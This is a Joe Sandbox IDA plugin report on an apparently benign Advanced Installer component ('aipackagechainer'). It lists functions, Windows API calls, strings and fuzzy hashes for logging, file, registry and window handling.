Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CreateDirectoryErrorLastPath
String ID: \\?\$\\?\UNC\
API String ID: 953296794-3019864461
Opcode ID: c099dcd93de70200768cdf31cce0d99cfcc736a30ffae2557e990a130b31f99b
Instruction ID: ac10c5190e2d508cb96859c8c49a6a31808f35e65cdae3c3cc5babd24cb0745d
Opcode Fuzzy Hash: c099dcd93de70200768cdf31cce0d99cfcc736a30ffae2557e990a130b31f99b
Instruction Fuzzy Hash: B861A171D006099FDB14EFA8C885BEDBBF5FF15321F244269E451A72D2DB749A04CB50

Function 000883B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,D11C52E5), ref: 000883EC

Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA

EnterCriticalSection.KERNEL32(?,D11C52E5), ref: 000883F9
OutputDebugStringW.KERNEL32(?,?,00000000), ref: 000884A5
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000F2D3D,000000FF), ref: 00088547

Strings

Logger::SetLogFile( %s ) while OLD path is:%s, xrefs: 0008842F

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$AllocateDebugEnterHeapInitializeLeaveOutputString
String ID: Logger::SetLogFile( %s ) while OLD path is:%s
API String ID: 117955849-1927537607
Opcode ID: 4ea8e502b8166f02010110854e41a41bd20c819e89c77e4a10c3ca6723212033
Instruction ID: 3b1712e8757e679a5b4ae73beb70301717696a146f5f21531378c9f1d8d11e85
Opcode Fuzzy Hash: 4ea8e502b8166f02010110854e41a41bd20c819e89c77e4a10c3ca6723212033
Instruction Fuzzy Hash: 03510531900646DFDB10EF64C905BBEBBB5FF15314F948659E941AB2A2EB319E01CB90

Function 00093B20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,D11C52E5), ref: 00093BFD
GetLastError.KERNEL32 ref: 00093C05
RemoveDirectoryW.KERNEL32(?,D11C52E5), ref: 00093C6D
GetLastError.KERNEL32 ref: 00093C75

Strings

p1Wu, xrefs: 00093BFD

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$DeleteDirectoryFileRemove
String ID: p1Wu
API String ID: 50330452-3125263879
Opcode ID: b90d3084f0a5c2810907c23650859721cf32e72e5fdf6718e86b1cde894a96eb
Instruction ID: 1589f9ef57bbe8af24023dd020fef3a025227ee8b5647dcd5f17b11986e4a59f
Opcode Fuzzy Hash: b90d3084f0a5c2810907c23650859721cf32e72e5fdf6718e86b1cde894a96eb
Instruction Fuzzy Hash: 33519D71A00219CFDF14CFA4D898BEEBBF1EF05304F154069E915AB252DB35AA08DFA1

Function 000A5100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,D11C52E5), ref: 000A5176
_wcsrchr.LIBVCRUNTIME ref: 000A51A0
RegQueryValueExW.ADVAPI32(00000000,0010DBD4,00000000,00000000,00000000,00000000,0010DBD4,00000001,?,00000000,00000000), ref: 000A5223
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 000A526F

Part of subcall function 000A5020: RegOpenKeyExW.ADVAPI32(00000000,D11C52E5,00000000,00020019,00000002,D11C52E5,00000001,00000010,00000002,000A436C,D11C52E5,00000000,00000000), ref: 000A50BC

Strings

hu, xrefs: 000A5176, 000A526F

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Close$OpenQueryValue_wcsrchr
String ID: hu
API String ID: 213811329-423011080
Opcode ID: 6312ade8ffdf4fe47aa4cebf523b430cf6f193af3434dd09ae6d5e38cab43a93
Instruction ID: 2316bbff7047530a661e68aa82eff31934c97ef6b4433b401ba10df73449c430
Opcode Fuzzy Hash: 6312ade8ffdf4fe47aa4cebf523b430cf6f193af3434dd09ae6d5e38cab43a93
Instruction Fuzzy Hash: 1851F071905749AFDB10CFA8DD48BAEBBB4FF46320F14826AE815A73C1D7759A04CB90

Function 000AC3F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 000AC428
GetFileSize.KERNEL32(?,00000000,?,00000000), ref: 000AC438

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

Strings

Local Network Server, xrefs: 000AC978, 000AC98A, 000AC994
HTTP/1.0, xrefs: 000AD025
FTP Server, xrefs: 000ACBD8, 000ACBEA, 000ACBF4

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: File$BuffersFlushHeapProcessSize
String ID: FTP Server$HTTP/1.0$Local Network Server
API String ID: 3404093814-2627868275
Opcode ID: d8a5cfbd4fba6825b995273699da75b7ee1563e821d4b6748a2f3dc6a9dd4b64
Instruction ID: fdb2d12570dd799d4d27e374a601b19e00c5c917d9de1b126e911012e548200c
Opcode Fuzzy Hash: d8a5cfbd4fba6825b995273699da75b7ee1563e821d4b6748a2f3dc6a9dd4b64
Instruction Fuzzy Hash: BD315C71A00249AFDB10CF68C844BAABBE8FF09320F11866AF925D7291D774DE10CB91

Function 000747E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00074822
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00074828
GetErrorInfo.OLEAUT32(00000000,00000000), ref: 0007485A

Strings

RoOriginateLanguageException, xrefs: 00074818
combase.dll, xrefs: 0007481D

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AddressErrorInfoLibraryLoadProc
String ID: RoOriginateLanguageException$combase.dll
API String ID: 1186719886-3996158991
Opcode ID: fec40373d6d7a15ce6cdab78045602cb8a29196814e20fbebf6dc804baa76458
Instruction ID: d650619ee6b31dcf74423efbd20f5c4eff5da6da139fba93d3486972380cf8ec
Opcode Fuzzy Hash: fec40373d6d7a15ce6cdab78045602cb8a29196814e20fbebf6dc804baa76458
Instruction Fuzzy Hash: B2315971D04249AFDB60DFA8D946BEEBBF4EB04310F104629E414A72D1DBB85A44CB96

Function 000DAAC7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D11C52E5,?,?,00000000,000FD075,000000FF,?,000DAA57,?,?,000DAA2B,?), ref: 000DAAFC
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000DAB0E
FreeLibrary.KERNEL32(00000000,?,00000000,000FD075,000000FF,?,000DAA57,?,?,000DAA2B,?), ref: 000DAB30

Strings

CorExitProcess, xrefs: 000DAB06
mscoree.dll, xrefs: 000DAAF5

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 14eb1954e0a1b43e9450dfbc13f6910a9e8b5fb2e9322208658daded06711765
Instruction ID: dbe8e780a9c91b5cfcfe640fb3163efd000586f276fee5ca41b8b10c9853de28
Opcode Fuzzy Hash: 14eb1954e0a1b43e9450dfbc13f6910a9e8b5fb2e9322208658daded06711765
Instruction Fuzzy Hash: 33016731A04659BFDB119F54CC09FBE7BF9FB04711F004526F911A26E0DBB89941CA54

Function 000B0180 Relevance: 7.7, APIs: 5, Instructions: 223windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 000B01A6
IsWindowVisible.USER32(?), ref: 000B01F1
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 000B0207
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 000B040C
RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 000B041D

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$MessageSend$LongRedrawVisible
String ID:
API String ID: 554559110-0
Opcode ID: 14bdf3f394d837f799a89748c2357f2e53b1c5486b894f19b1b42e9441cf09ba
Instruction ID: 5ca54fc032dffb9135400d6daec22dde6f031f4e6e0cfb1bc762ea95d6da2533
Opcode Fuzzy Hash: 14bdf3f394d837f799a89748c2357f2e53b1c5486b894f19b1b42e9441cf09ba
Instruction Fuzzy Hash: 50815671A087119FD714CF18C884A9BFBE6FF88710F15891EF999A72A0D771E940CB82

Function 000DFD12 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 000DFD99
__alloca_probe_16.LIBCMT ref: 000DFE5A
__freea.LIBCMT ref: 000DFEC1

Part of subcall function 000DD733: HeapAlloc.KERNEL32(00000000,00000000,000DB467,?,000DFC0B,?,00000000,?,000D7441,00000000,000DB467,00000000,?,?,?,000DB261), ref: 000DD765

__freea.LIBCMT ref: 000DFED6
__freea.LIBCMT ref: 000DFEE6

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: c20e8191d78e8f04356759663513bd5382401ef66bddf7252c2948eb58886255
Instruction ID: 99b31c2455bcdd69231bf8630f840c03000ce30e707689f66030d887c837dd72
Opcode Fuzzy Hash: c20e8191d78e8f04356759663513bd5382401ef66bddf7252c2948eb58886255
Instruction Fuzzy Hash: DB518E72600317AFEB219F64DC41EFF77A9EB44350B19813AFD0AD6262EA70CC5096B0

Function 000ACAE0 Relevance: 7.7, APIs: 5, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 27303f4252ee3363573543187dd0bec278ee43734e397a53ec3b625fd0bb7c58
Instruction ID: f8948a666b90b57abe07c8bcb1fdb00c12df5ba6103951913ba204c87e77e918
Opcode Fuzzy Hash: 27303f4252ee3363573543187dd0bec278ee43734e397a53ec3b625fd0bb7c58
Instruction Fuzzy Hash: D4817F71900245EFEB10CFA8C948B9EBFF5FF49324F158268E915AB392DB758940CB91

Function 000A6E00 Relevance: 7.7, APIs: 5, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,D11C52E5,?,?,00000000,?,?,?,00000000,000F909D,000000FF,?,00095CD7), ref: 000A6E40
CreateThread.KERNEL32(00000000,00000000,000A71B0,?,00000000,00000000), ref: 000A6E76
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 000A6F80
GetExitCodeThread.KERNEL32(00000000,00000000), ref: 000A6F8B
CloseHandle.KERNEL32(00000000), ref: 000A6FAB

Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CreateThread$AllocateCloseCodeEventExitHandleHeapObjectSingleWait
String ID:
API String ID: 978852114-0
Opcode ID: b771c0a338d723a2b5b84c777ba1a87ce38157bd8eb20ad0492a7d85960b899d
Instruction ID: e632529f15943b4c83153037a34513e5b6af4512756cfd14a95b122edc863afe
Opcode Fuzzy Hash: b771c0a338d723a2b5b84c777ba1a87ce38157bd8eb20ad0492a7d85960b899d
Instruction Fuzzy Hash: DC516B75A00709DFCB20CFA8D984BAABBF4FF49310F244669F916A77A1D731A840CB50

Function 000AFA30 Relevance: 7.7, APIs: 5, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

SetWindowTextW.USER32(00000000,000FA9B5), ref: 000AFABF
GetDlgItem.USER32(00000000,0000042B), ref: 000AFB17
SetWindowTextW.USER32(00000000,00000000), ref: 000AFB1E
GetDlgItem.USER32(?,00000001), ref: 000AFB2B
EnableWindow.USER32(00000000,00000000), ref: 000AFB30

Part of subcall function 00098930: GetWindowLongW.USER32(?,000000F0), ref: 00098977
Part of subcall function 00098930: GetParent.USER32(00000000), ref: 0009898A
Part of subcall function 00098930: GetWindowRect.USER32(?,?), ref: 000989AB
Part of subcall function 00098930: GetWindowLongW.USER32(00000000,000000F0), ref: 000989BE
Part of subcall function 00098930: MonitorFromWindow.USER32(?,00000002), ref: 000989D6
Part of subcall function 00098930: GetMonitorInfoW.USER32(00000000,?), ref: 000989EC

Part of subcall function 000AFD00: GetWindowLongW.USER32(?,000000F0), ref: 000AFD2D
Part of subcall function 000AFD00: GetWindowLongW.USER32(?,000000F0), ref: 000AFD42
Part of subcall function 000AFD00: SetWindowLongW.USER32(?,000000F0,00000000), ref: 000AFD59
Part of subcall function 000AFD00: GetWindowLongW.USER32(?,000000EC), ref: 000AFD72
Part of subcall function 000AFD00: SetWindowLongW.USER32(?,000000EC,00000000), ref: 000AFD86
Part of subcall function 000AFD00: SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 000AFD94
Part of subcall function 000AFD00: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000AFDA7
Part of subcall function 000AFD00: IsWindow.USER32(00000000), ref: 000AFDC2
Part of subcall function 000AFD00: DestroyWindow.USER32(00000000), ref: 000AFDDE
Part of subcall function 000AFD00: GetClientRect.USER32(?,?), ref: 000AFE36

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$ItemMessageMonitorRectSendText$ClientDestroyEnableFromHeapInfoParentProcess
String ID:
API String ID: 442920686-0
Opcode ID: caec2dd3f9e9ed5af007952718248e122f8f138634b56c4ae963d94e24da1355
Instruction ID: 34ba9f9befd290c97af754ebce27ffa459c280c163a5a812b5cd5f6fc8f5929d
Opcode Fuzzy Hash: caec2dd3f9e9ed5af007952718248e122f8f138634b56c4ae963d94e24da1355
Instruction Fuzzy Hash: 04518E319016099FDB10DBA8CC48BAEBBB5FF49310F148269E4159B2A2DB349D05CB91

Function 000CB60C Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 000CB613
std::_Lockit::_Lockit.LIBCPMT ref: 000CB61D

Part of subcall function 000692C0: std::_Lockit::_Lockit.LIBCPMT ref: 000692F0
Part of subcall function 000692C0: std::_Lockit::~_Lockit.LIBCPMT ref: 00069318

codecvt.LIBCPMT ref: 000CB657
std::_Facet_Register.LIBCPMT ref: 000CB66E
std::_Lockit::~_Lockit.LIBCPMT ref: 000CB68E

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 5a5e0897299c3c715524dd359057064412ac4ebcd16a57b262a1c6d5f3a548b8
Instruction ID: c6e4087f333691b686d3567e048759ed1ba8e96bd3718f1d27cbc9a101dbdda1
Opcode Fuzzy Hash: 5a5e0897299c3c715524dd359057064412ac4ebcd16a57b262a1c6d5f3a548b8
Instruction Fuzzy Hash: B321F676A00119ABCB11EFA4D882FEEB7B9BF44320F14451EF805AB292DF749D05C791

Function 000CC7EF Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00128FDC,00000000,?,000639E7,001298D8,000FD280), ref: 000CC7F9
LeaveCriticalSection.KERNEL32(00128FDC,?,000639E7,001298D8,000FD280), ref: 000CC82C
RtlWakeAllConditionVariable.NTDLL ref: 000CC8A3
SetEvent.KERNEL32(?,001298D8,000FD280), ref: 000CC8AD
ResetEvent.KERNEL32(?,001298D8,000FD280), ref: 000CC8B9

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: c570b51f5c9f9a55f2456ebacef031eb66c0426f68af69522881a4e74155e547
Instruction ID: c4acbfe163f820354c1ad5edf1b618007aa3e80f315196edf0b135dbea80cd0f
Opcode Fuzzy Hash: c570b51f5c9f9a55f2456ebacef031eb66c0426f68af69522881a4e74155e547
Instruction Fuzzy Hash: BF018171905160EFD725AF18FD48DAA3BAAFB097107010469FA0593BB0CB341C92EFD8

Function 00089280 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

APIs

Part of subcall function 0008D5C0: SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,?,?,00129AFC), ref: 0008D5D0
Part of subcall function 0008D5C0: LoadLibraryW.KERNEL32(Shell32.dll,?,?,00129AFC), ref: 0008D5E3
Part of subcall function 0008D5C0: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0008D5F3

PathFileExistsW.SHLWAPI(?,ADVINST_LOGS,0000000C,00129AFC), ref: 00089368

Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA

Strings

ADVINST_LOGS, xrefs: 0008935B
Everyone, xrefs: 00089384

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AddressAllocateExistsFileFolderHeapLibraryLoadLocationPathProcSpecial
String ID: ADVINST_LOGS$Everyone
API String ID: 3321256476-3921853867
Opcode ID: b528943ecb67d0c5a566836e3681ae61b73ca012211557adda5a81d40a111a60
Instruction ID: 1e0bcf7d7dd73b237c670ea297d8447453f22f9178a259611f8f7397edf507dd
Opcode Fuzzy Hash: b528943ecb67d0c5a566836e3681ae61b73ca012211557adda5a81d40a111a60
Instruction Fuzzy Hash: 3891BCB1901609DFDB10EFA8C949BEEB7F4BF14314F284158E946AB2D2DB355E05CBA0

Function 00082160 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,?,?,?,D11C52E5,?,?), ref: 00082281

Strings

\\?\UNC\, xrefs: 000822A3, 00082360
*.*, xrefs: 00082174
\\?\, xrefs: 00082376, 000823CE, 000823D3

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Path
String ID: *.*$\\?\$\\?\UNC\
API String ID: 2875597873-1700010636
Opcode ID: 42cbc1a414ebe8ca46aea321c7826d93e0cb6c01a30ae608662f569a807686f3
Instruction ID: 3319a0cd54e58bf7d0962c4dd7bd3bcf4c552027673140490f5eb1abc2598168
Opcode Fuzzy Hash: 42cbc1a414ebe8ca46aea321c7826d93e0cb6c01a30ae608662f569a807686f3
Instruction Fuzzy Hash: 8E81E171A00605DFDB10EF68C859BAEF7F6FF54324F108268E554DB292DB75AA40CB90

Function 000AC000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,000AB107,00000000,.part,00000005,?,?,?,D11C52E5), ref: 000AC00D
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,000AB107,00000000,.part,00000005,?,?,?,D11C52E5), ref: 000AC02E
GetLastError.KERNEL32(000AB107,00000000,.part,00000005,?,?,?,D11C52E5), ref: 000AC08E

Strings

AdvancedInstaller, xrefs: 000AC076

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CreateEvent$ErrorLast
String ID: AdvancedInstaller
API String ID: 1131763895-1372594473
Opcode ID: 4700b51f1cbb4e8eb6fce30b5f73c1397bf28428f3cbde15b0398f23653fd63b
Instruction ID: 5266bfac2f0fa40bc03d2a4e4a5a88374ed2600be66f3a9a534eff132342f2c0
Opcode Fuzzy Hash: 4700b51f1cbb4e8eb6fce30b5f73c1397bf28428f3cbde15b0398f23653fd63b
Instruction Fuzzy Hash: F6115B71340742FBE720DB64CC89F6ABBA5FB94705F214424F6059B690DBB1B851CB94

Function 000BB850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 000BB887
SysFreeString.OLEAUT32 ref: 000BB89E
